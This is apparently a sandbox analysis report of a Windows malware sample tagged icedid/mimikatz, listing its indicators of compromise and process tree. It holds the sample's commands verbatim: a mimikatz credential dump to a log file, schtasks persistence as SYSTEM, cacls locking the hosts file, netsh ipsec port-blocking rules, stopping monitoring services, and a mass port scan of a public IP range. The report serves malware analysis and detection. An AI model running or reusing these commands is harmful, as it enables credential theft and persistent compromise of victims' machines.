\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nvmribbga.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iuclszl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iuclszl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5092 cmd.exe 4840 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x00080000000234d8-5.dat nsis_installer_2 behavioral2/files/0x00110000000234ed-15.dat nsis_installer_1 behavioral2/files/0x00110000000234ed-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" iuclszl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" iuclszl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ iuclszl.exe Key created \REGISTRY\USER\.DEFAULT\Software teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing iuclszl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" iuclszl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" iuclszl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" teaimmcwl.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ iuclszl.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4840 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1844 schtasks.exe 1416 schtasks.exe 5080 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4996 2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4996 2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 216 iuclszl.exe Token: SeDebugPrivilege 3536 iuclszl.exe Token: SeDebugPrivilege 3616 vfshost.exe Token: SeDebugPrivilege 4228 teaimmcwl.exe Token: SeLockMemoryPrivilege 3756 nqrzsm.exe Token: SeLockMemoryPrivilege 3756 nqrzsm.exe Token: SeDebugPrivilege 4896 teaimmcwl.exe Token: SeDebugPrivilege 4860 teaimmcwl.exe Token: SeDebugPrivilege 748 teaimmcwl.exe Token: SeDebugPrivilege 2268 teaimmcwl.exe Token: SeDebugPrivilege 4272 teaimmcwl.exe Token: SeDebugPrivilege 4468 teaimmcwl.exe Token: SeDebugPrivilege 2708 teaimmcwl.exe Token: SeDebugPrivilege 4228 teaimmcwl.exe Token: SeDebugPrivilege 4000 teaimmcwl.exe Token: SeDebugPrivilege 3952 teaimmcwl.exe Token: SeDebugPrivilege 1956 teaimmcwl.exe Token: SeDebugPrivilege 4376 teaimmcwl.exe Token: SeDebugPrivilege 3268 teaimmcwl.exe Token: SeDebugPrivilege 3480 teaimmcwl.exe Token: SeDebugPrivilege 2708 teaimmcwl.exe Token: SeDebugPrivilege 4836 teaimmcwl.exe Token: SeDebugPrivilege 888 teaimmcwl.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4996 2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe 4996 2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe 216 iuclszl.exe 216 iuclszl.exe 3536 iuclszl.exe 3536 iuclszl.exe 1940 xohudmc.exe 1408 ogmqci.exe 4536 iuclszl.exe 4536 iuclszl.exe 5836 iuclszl.exe 5836 iuclszl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4996 wrote to memory of 5092 4996 2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe 87 PID 4996 wrote to memory of 5092 4996 2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe 87 PID 4996 wrote to memory of 5092 4996 2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe 87 PID 5092 wrote to memory of 4840 5092 cmd.exe 89 PID 5092 wrote to memory of 4840 5092 cmd.exe 89 PID 5092 wrote to memory of 4840 5092 cmd.exe 89 PID 5092 wrote to memory of 216 5092 cmd.exe 96 PID 5092 wrote to memory of 216 5092 cmd.exe 96 PID 5092 wrote to memory of 216 5092 cmd.exe 96 PID 3536 wrote to memory of 2496 3536 iuclszl.exe 98 PID 3536 wrote to memory of 2496 3536 iuclszl.exe 98 PID 3536 wrote to memory of 2496 3536 iuclszl.exe 98 PID 2496 wrote to memory of 3288 2496 cmd.exe 100 PID 2496 wrote to memory of 3288 2496 cmd.exe 100 PID 2496 wrote to memory of 3288 2496 cmd.exe 100 PID 2496 wrote to memory of 2560 2496 cmd.exe 101 PID 2496 wrote to memory of 2560 2496 cmd.exe 101 PID 2496 wrote to memory of 2560 2496 cmd.exe 101 PID 2496 wrote to memory of 3576 2496 cmd.exe 102 PID 2496 wrote to memory of 3576 2496 cmd.exe 102 PID 2496 wrote to memory of 3576 2496 cmd.exe 102 PID 2496 wrote to memory of 4912 2496 cmd.exe 103 PID 2496 wrote to memory of 4912 2496 cmd.exe 103 PID 2496 wrote to memory of 4912 2496 cmd.exe 103 PID 2496 wrote to memory of 1596 2496 cmd.exe 104 PID 2496 wrote to memory of 1596 2496 cmd.exe 104 PID 2496 wrote to memory of 1596 2496 cmd.exe 104 PID 2496 wrote to memory of 4300 2496 cmd.exe 105 PID 2496 wrote to memory of 4300 2496 cmd.exe 105 PID 2496 wrote to memory of 4300 2496 cmd.exe 105 PID 3536 wrote to memory of 2044 3536 iuclszl.exe 106 PID 3536 wrote to memory of 2044 3536 iuclszl.exe 106 PID 3536 wrote to memory of 2044 3536 iuclszl.exe 106 PID 3536 wrote to memory of 1956 3536 iuclszl.exe 109 PID 3536 wrote to memory of 1956 3536 iuclszl.exe 109 PID 3536 wrote to memory of 1956 3536 iuclszl.exe 109 PID 3536 wrote to memory of 3376 3536 iuclszl.exe 111 PID 3536 wrote to memory of 3376 3536 iuclszl.exe 111 PID 3536 wrote to memory of 3376 3536 iuclszl.exe 111 PID 3536 wrote to memory of 3804 3536 iuclszl.exe 115 PID 3536 wrote to memory of 3804 3536 iuclszl.exe 115 PID 3536 wrote to memory of 3804 3536 iuclszl.exe 115 PID 3804 wrote to memory of 1152 3804 cmd.exe 117 PID 3804 wrote to memory of 1152 3804 cmd.exe 117 PID 3804 wrote to memory of 1152 3804 cmd.exe 117 PID 1152 wrote to memory of 2360 1152 wpcap.exe 118 PID 1152 wrote to memory of 2360 1152 wpcap.exe 118 PID 1152 wrote to memory of 2360 1152 wpcap.exe 118 PID 2360 wrote to memory of 3008 2360 net.exe 120 PID 2360 wrote to memory of 3008 2360 net.exe 120 PID 2360 wrote to memory of 3008 2360 net.exe 120 PID 1152 wrote to memory of 3708 1152 wpcap.exe 121 PID 1152 wrote to memory of 3708 1152 wpcap.exe 121 PID 1152 wrote to memory of 3708 1152 wpcap.exe 121 PID 3708 wrote to memory of 3124 3708 net.exe 123 PID 3708 wrote to memory of 3124 3708 net.exe 123 PID 3708 wrote to memory of 3124 3708 net.exe 123 PID 1152 wrote to memory of 4472 1152 wpcap.exe 124 PID 1152 wrote to memory of 4472 1152 wpcap.exe 124 PID 1152 wrote to memory of 4472 1152 wpcap.exe 124 PID 4472 wrote to memory of 4260 4472 net.exe 126 PID 4472 wrote to memory of 4260 4472 net.exe 126 PID 4472 wrote to memory of 4260 4472 net.exe 126 PID 1152 wrote to memory of 4716 1152 wpcap.exe 127
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2132
-
C:\Windows\TEMP\awlverzbi\nqrzsm.exe"C:\Windows\TEMP\awlverzbi\nqrzsm.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3756
-
-
C:\Users\Admin\AppData\Local\Temp\2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bekggbli\iuclszl.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4840
-
-
C:\Windows\bekggbli\iuclszl.exeC:\Windows\bekggbli\iuclszl.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:216
-
-
-
C:\Windows\bekggbli\iuclszl.exeC:\Windows\bekggbli\iuclszl.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3288
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3576
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:4912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1596
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4300
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2044
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1956
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3376
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exeC:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:3008
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3124
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:4260
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:4716 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:4636
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3152 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3812
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1020
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3172 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4808 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4888
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\dvpvfgkqq\vefdcrtiv\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:232 -
C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exeC:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\dvpvfgkqq\vefdcrtiv\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\dvpvfgkqq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\dvpvfgkqq\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:972 -
C:\Windows\dvpvfgkqq\Corporate\vfshost.exeC:\Windows\dvpvfgkqq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3616
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "blssqdfbz" /ru system /tr "cmd /c C:\Windows\ime\iuclszl.exe"2⤵PID:3724
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4832
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "blssqdfbz" /ru system /tr "cmd /c C:\Windows\ime\iuclszl.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "declipgtc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:1316 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "declipgtc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "imcesgivu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:1536 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "imcesgivu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1416
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3892
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5104
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:640
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
